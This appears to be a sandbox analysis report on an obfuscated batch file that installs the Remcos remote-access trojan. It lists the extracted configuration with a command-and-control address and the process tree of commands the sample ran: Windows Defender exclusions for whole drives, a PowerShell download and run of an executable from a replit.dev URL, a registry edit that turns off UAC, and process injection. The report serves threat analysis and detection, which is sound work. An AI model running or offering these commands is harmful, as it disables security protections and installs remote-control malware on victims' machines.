remcos | 0ccdb4a818091ae2e5725a7f1ba92487576df540f9f3a197fc0ae38ddda480cb

Analysis

max time kernel
149s
max time network
145s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-11-2024 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document_obf.bat
Size

1KB
MD5

4f4e694e3986ffa9959b38e093d9da44
SHA1

3a2670365ed398a60c5a7f86ecd8778e295e3bef
SHA256

0ccdb4a818091ae2e5725a7f1ba92487576df540f9f3a197fc0ae38ddda480cb
SHA512

7194250b629770adb40f76ba28dcdde5f0f78351623c046ee44e3a92ae0835810e391fce1b2c47f0ac0c88ba7f20742d18175e221e28f3b0e37638a787d1f4dc

Score

10^/10

remcos remotehost discovery evasion execution rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

194.59.31.143:4444

Attributes

audio_folder
xboxGameBar
audio_path
%SystemDrive%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
ploi.exe
copy_folder
koi
delete_file
true
hide_file
true
hide_keylog_file
false
install_flag
false
install_path
%SystemDrive%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-ZU01ZO
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	2372	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3120	powershell.exe
3176	powershell.exe
4600	powershell.exe
2372	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2136	nostart.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2136 set thread context of 244	2136	nostart.exe	101
PID 244 set thread context of 4440	244	iexplore.exe	105

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nostart.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1112	reg.exe
5016	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4504	WMIC.exe
4504	WMIC.exe
4504	WMIC.exe
4504	WMIC.exe
3120	powershell.exe
3120	powershell.exe
3176	powershell.exe
3176	powershell.exe
4600	powershell.exe
4600	powershell.exe
2372	powershell.exe
2372	powershell.exe
2136	nostart.exe
2136	nostart.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2136	nostart.exe
244	iexplore.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4504	WMIC.exe
Token: SeSecurityPrivilege	4504	WMIC.exe
Token: SeTakeOwnershipPrivilege	4504	WMIC.exe
Token: SeLoadDriverPrivilege	4504	WMIC.exe
Token: SeSystemProfilePrivilege	4504	WMIC.exe
Token: SeSystemtimePrivilege	4504	WMIC.exe
Token: SeProfSingleProcessPrivilege	4504	WMIC.exe
Token: SeIncBasePriorityPrivilege	4504	WMIC.exe
Token: SeCreatePagefilePrivilege	4504	WMIC.exe
Token: SeBackupPrivilege	4504	WMIC.exe
Token: SeRestorePrivilege	4504	WMIC.exe
Token: SeShutdownPrivilege	4504	WMIC.exe
Token: SeDebugPrivilege	4504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4504	WMIC.exe
Token: SeRemoteShutdownPrivilege	4504	WMIC.exe
Token: SeUndockPrivilege	4504	WMIC.exe
Token: SeManageVolumePrivilege	4504	WMIC.exe
Token: 33	4504	WMIC.exe
Token: 34	4504	WMIC.exe
Token: 35	4504	WMIC.exe
Token: 36	4504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4504	WMIC.exe
Token: SeSecurityPrivilege	4504	WMIC.exe
Token: SeTakeOwnershipPrivilege	4504	WMIC.exe
Token: SeLoadDriverPrivilege	4504	WMIC.exe
Token: SeSystemProfilePrivilege	4504	WMIC.exe
Token: SeSystemtimePrivilege	4504	WMIC.exe
Token: SeProfSingleProcessPrivilege	4504	WMIC.exe
Token: SeIncBasePriorityPrivilege	4504	WMIC.exe
Token: SeCreatePagefilePrivilege	4504	WMIC.exe
Token: SeBackupPrivilege	4504	WMIC.exe
Token: SeRestorePrivilege	4504	WMIC.exe
Token: SeShutdownPrivilege	4504	WMIC.exe
Token: SeDebugPrivilege	4504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4504	WMIC.exe
Token: SeRemoteShutdownPrivilege	4504	WMIC.exe
Token: SeUndockPrivilege	4504	WMIC.exe
Token: SeManageVolumePrivilege	4504	WMIC.exe
Token: 33	4504	WMIC.exe
Token: 34	4504	WMIC.exe
Token: 35	4504	WMIC.exe
Token: 36	4504	WMIC.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeIncreaseQuotaPrivilege	3120	powershell.exe
Token: SeSecurityPrivilege	3120	powershell.exe
Token: SeTakeOwnershipPrivilege	3120	powershell.exe
Token: SeLoadDriverPrivilege	3120	powershell.exe
Token: SeSystemProfilePrivilege	3120	powershell.exe
Token: SeSystemtimePrivilege	3120	powershell.exe
Token: SeProfSingleProcessPrivilege	3120	powershell.exe
Token: SeIncBasePriorityPrivilege	3120	powershell.exe
Token: SeCreatePagefilePrivilege	3120	powershell.exe
Token: SeBackupPrivilege	3120	powershell.exe
Token: SeRestorePrivilege	3120	powershell.exe
Token: SeShutdownPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeSystemEnvironmentPrivilege	3120	powershell.exe
Token: SeRemoteShutdownPrivilege	3120	powershell.exe
Token: SeUndockPrivilege	3120	powershell.exe
Token: SeManageVolumePrivilege	3120	powershell.exe
Token: 33	3120	powershell.exe
Token: 34	3120	powershell.exe
Token: 35	3120	powershell.exe
Token: 36	3120	powershell.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 1136	2728	cmd.exe	83
PID 2728 wrote to memory of 1136	2728	cmd.exe	83
PID 1136 wrote to memory of 2548	1136	net.exe	84
PID 1136 wrote to memory of 2548	1136	net.exe	84
PID 2728 wrote to memory of 2272	2728	cmd.exe	85
PID 2728 wrote to memory of 2272	2728	cmd.exe	85
PID 2272 wrote to memory of 4504	2272	cmd.exe	86
PID 2272 wrote to memory of 4504	2272	cmd.exe	86
PID 2272 wrote to memory of 3328	2272	cmd.exe	87
PID 2272 wrote to memory of 3328	2272	cmd.exe	87
PID 2728 wrote to memory of 3120	2728	cmd.exe	89
PID 2728 wrote to memory of 3120	2728	cmd.exe	89
PID 2728 wrote to memory of 3176	2728	cmd.exe	92
PID 2728 wrote to memory of 3176	2728	cmd.exe	92
PID 2728 wrote to memory of 4600	2728	cmd.exe	93
PID 2728 wrote to memory of 4600	2728	cmd.exe	93
PID 2728 wrote to memory of 2372	2728	cmd.exe	96
PID 2728 wrote to memory of 2372	2728	cmd.exe	96
PID 2728 wrote to memory of 2136	2728	cmd.exe	99
PID 2728 wrote to memory of 2136	2728	cmd.exe	99
PID 2728 wrote to memory of 2136	2728	cmd.exe	99
PID 2136 wrote to memory of 320	2136	nostart.exe	100
PID 2136 wrote to memory of 320	2136	nostart.exe	100
PID 2136 wrote to memory of 320	2136	nostart.exe	100
PID 2136 wrote to memory of 244	2136	nostart.exe	101
PID 2136 wrote to memory of 244	2136	nostart.exe	101
PID 2136 wrote to memory of 244	2136	nostart.exe	101
PID 2136 wrote to memory of 244	2136	nostart.exe	101
PID 244 wrote to memory of 5064	244	iexplore.exe	103
PID 244 wrote to memory of 5064	244	iexplore.exe	103
PID 244 wrote to memory of 5064	244	iexplore.exe	103
PID 244 wrote to memory of 4440	244	iexplore.exe	105
PID 244 wrote to memory of 4440	244	iexplore.exe	105
PID 244 wrote to memory of 4440	244	iexplore.exe	105
PID 320 wrote to memory of 1112	320	cmd.exe	106
PID 320 wrote to memory of 1112	320	cmd.exe	106
PID 320 wrote to memory of 1112	320	cmd.exe	106
PID 244 wrote to memory of 4440	244	iexplore.exe	105
PID 5064 wrote to memory of 5016	5064	cmd.exe	107
PID 5064 wrote to memory of 5016	5064	cmd.exe	107
PID 5064 wrote to memory of 5016	5064	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic logicaldisk get name | find ":"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic logicaldisk get name
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4504
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:3328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'F:\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { exit 1 }"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2372
- C:\Users\Admin\AppData\Local\Temp\nostart.exe
  "C:\Users\Admin\AppData\Local\Temp\nostart.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1112
- - \??\c:\program files (x86)\internet explorer\iexplore.exe
    "c:\program files (x86)\internet explorer\iexplore.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:244
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5064
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:5016
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      PID:4440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c67441dfa09f61bca500bb43407c56b8

SHA1
5a56cf7cbeb48c109e2128c31b681fac3959157b

SHA256
63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

SHA512
325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
39490fef2fafe1b3fb41e76133c65e35

SHA1
6c260d6ea70a6a4375d237cc3c96bc589c5f4345

SHA256
0539fc818420ffaff01dd09ee3405f1ea9b8e4e7fe3c0ec472cadd1f8a6fd8a5

SHA512
e82615eb8821db3f5e886cd61cc650c3c622cb677c14815603b10b753c5d2df2d34ac033f97ec39822e8de5fa2f2d2c64bbe20397519941a684bb42c9dd4e813

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a9228e36530a252a1ccc26846ca0c22f

SHA1
0ea5ec429eaebdba0763a30286d437044a0ec9e2

SHA256
29575cae463cb609f58c55a94ec2a4551c5b19c9e0c13938cb22d73eaa9cad8a

SHA512
ea9abf940b2900b2693aaa8c8f6b8c8d1d6714cb14604bc473f76ea6cd0179bf5fec8479a1419e66697dc2a06e432d252c63859d1eb38654e206d54c851f7b38

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rnh1npv.e1e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nostart.exe

Filesize
481KB

MD5
3a57301d5b27cf1ef1f634af4950f593

SHA1
fd21a65c2272ef3bb05521994022e56ab017b494

SHA256
8df3bcdf64bbc3752bcdc19b64fc50aaff8333c78f470e52a96001c7a7529318

SHA512
d0392099fcbb5c5e50732213d666b96b5e17c7c50ddfecad35b7930111d08c3d39d067bd9774fb7a430db68f8c84d51e863ee4b39f274329d62918610093b80c

Download Submit
memory/244-61-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-66-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-82-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-81-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-80-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-79-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-77-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-56-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-57-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-58-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-78-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-75-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-73-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-64-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-65-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-74-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-69-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-70-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-71-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/244-72-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3120-17-0x00007FFB585E0000-0x00007FFB590A2000-memory.dmp

Filesize
10.8MB

Download
memory/3120-0-0x00007FFB585E3000-0x00007FFB585E5000-memory.dmp

Filesize
8KB

Download
memory/3120-10-0x0000018670570000-0x0000018670592000-memory.dmp

Filesize
136KB

Download
memory/3120-11-0x00007FFB585E0000-0x00007FFB590A2000-memory.dmp

Filesize
10.8MB

Download
memory/3120-12-0x00007FFB585E0000-0x00007FFB590A2000-memory.dmp

Filesize
10.8MB

Download
memory/3120-13-0x00007FFB585E0000-0x00007FFB590A2000-memory.dmp

Filesize
10.8MB

Download
memory/3120-14-0x00007FFB585E0000-0x00007FFB590A2000-memory.dmp

Filesize
10.8MB

Download
memory/4440-63-0x0000000000810000-0x000000000088F000-memory.dmp

Filesize
508KB

Download
memory/4440-62-0x0000000000810000-0x000000000088F000-memory.dmp

Filesize
508KB

Download